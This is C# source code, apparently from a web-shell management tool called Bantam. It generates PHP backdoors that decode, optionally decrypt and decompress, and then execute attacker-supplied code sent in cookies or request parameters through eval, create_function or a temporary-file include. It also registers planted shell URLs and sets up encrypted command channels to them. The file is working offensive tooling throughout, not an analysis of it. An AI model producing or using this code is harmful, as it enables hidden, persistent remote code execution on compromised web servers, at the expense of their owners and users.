/// <summary> /// Main backdoor "generation" code that forms the backdoor code based on the options /// </summary> /// <param name="varName"></param> /// <param name="method"></param> /// <param name="gzInflateRequest"></param> /// <param name="backdoorType"></param> /// <returns></returns> public string generateBackdoor(string varName = "command", string method = "COOKIE", bool gzInflateRequest = false, BackdoorTypes backdoorType = BackdoorTypes.EVAL) { string backdoorResult = string.Empty; string gzInflateStart = string.Empty; string gzInflateEnd = string.Empty; string requestEncryptionStart = string.Empty; string requestEncryptionEnd = string.Empty; string requestMethod = method.ToUpper(CultureInfo.InvariantCulture); if (checkBoxEncryptRequest.Checked) { string encryptionKey = textBoxEncrpytionKey.Text; if (encryptionKey.Length == CryptoHelper.KEY_Length) { if (checkBoxSendIVInRequest.Checked) { string encryptionIVVarName = textBoxIVVarName.Text; if (!string.IsNullOrEmpty(encryptionIVVarName)) { if (comboBoxRequestEncryptionType.Text == "openssl") { requestEncryptionStart = "@openssl_decrypt("; requestEncryptionEnd = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, $_" + requestMethod + "['" + encryptionIVVarName + "'])"; } else if (comboBoxRequestEncryptionType.Text == "mcrypt") { requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', "; requestEncryptionEnd = ", MCRYPT_MODE_CBC, $_" + requestMethod + "['" + encryptionIVVarName + "']), \"0\")"; } } } else { string encryptionIV = textBoxEncrpytionIV.Text; if (!string.IsNullOrEmpty(encryptionIV) && encryptionIV.Length == CryptoHelper.IV_Length) { if (comboBoxRequestEncryptionType.Text == "openssl") { requestEncryptionStart = "@openssl_decrypt("; requestEncryptionEnd = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, '" + encryptionIV + "')"; } else if (comboBoxRequestEncryptionType.Text == "mcrypt") { requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', "; requestEncryptionEnd = ", MCRYPT_MODE_CBC, '" + encryptionIV + "'), \"0\")"; } } } } } if (gzInflateRequest) { gzInflateStart = "@gzinflate("; gzInflateEnd = ")"; } switch (backdoorType) { case BackdoorTypes.EVAL: { backdoorResult = "<?php \r\n" + "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" + "@eval(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}"; break; } //case BackdoorTypes.ASSERT: { // backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@assert(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}"; // break; // } case BackdoorTypes.CREATE_FUNCTION: { backdoorResult = "<?php \r\n" + "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" + "$a=@create_function(null, " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" + "$a();\r\n}"; break; } case BackdoorTypes.TMP_INCLUDE: { backdoorResult = "<?php \r\n" + "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" + "$fp = @tmpfile();\r\n\t" + "$tmpf=@stream_get_meta_data($fp);\r\n\t" + "$tmpf=$tmpf['uri'];\r\n\t" + "@fwrite($fp, '<?php '." + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" + "@include($tmpf);\r\n\t@fclose($f);\r\n}"; break; } //case BackdoorTypes.PREG_REPLACE: { // //todo this looks wrong af and doesnt support gzip // backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@preg_replace(\"/.*/\x65\", " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "']" + requestEncryptionEnd + gzInflateEnd + "),'.');\r\n}"; // break; // } default: LogHelper.AddGlobalLog("Unknown backdoor type selection.", "GUI Error", LogHelper.LOG_LEVEL.ERROR); break; } if (chkbxMinifyCode.Checked) { backdoorResult = Helper.MinifyCode(backdoorResult); } return(backdoorResult); }
/// <summary> /// Main add shell/host To GUI routine /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private async void btnAddShell_Click(object sender, EventArgs e) { string shellURL = txtBoxShellUrl.Text; if (string.IsNullOrEmpty(shellURL)) { return; } if (checkBoxEncryptRequest.Checked) { string encryptionKey = textBoxEncrpytionKey.Text; if (encryptionKey.Length != 32) { labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again."; return; } if (!checkBoxSendIVInRequest.Checked) { string encryptionIV = textBoxEncrpytionIV.Text; if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16) { labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again."; return; } } } //Remove Shell if (BantamMain.Shells.ContainsKey(shellURL)) { BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL); if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut)) { LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR); return; } } //Add Shell if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo())) { LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR); return; } BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text; if (comboBoxVarType.Text == "cookie") { BantamMain.Shells[shellURL].SendDataViaCookie = true; } if (checkBoxResponseEncryption.Checked == false) { BantamMain.Shells[shellURL].ResponseEncryption = false; } else { BantamMain.Shells[shellURL].ResponseEncryption = true; BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex; } if (checkBoxGZipRequest.Checked) { BantamMain.Shells[shellURL].GzipRequestData = true; } else { BantamMain.Shells[shellURL].GzipRequestData = false; } bool encryptResponse = BantamMain.Shells[shellURL].ResponseEncryption; int ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode; if (checkBoxEncryptRequest.Checked) { BantamMain.Shells[shellURL].RequestEncryption = true; BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text; if (checkBoxSendIVInRequest.Checked) { BantamMain.Shells[shellURL].SendRequestEncryptionIV = true; BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty; BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text; } else { BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text; BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty; } } else { BantamMain.Shells[shellURL].RequestEncryption = false; BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty; BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty; BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty; } string phpCode = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse); ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode); if (string.IsNullOrEmpty(response.Result)) { labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again."; BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut); return; } string result = response.Result; if (encryptResponse) { result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode); } if (string.IsNullOrEmpty(result) || result != "1") { labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again."; BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut); return; } BantamMain.Instance.InitializeShellData(shellURL); this.Close(); }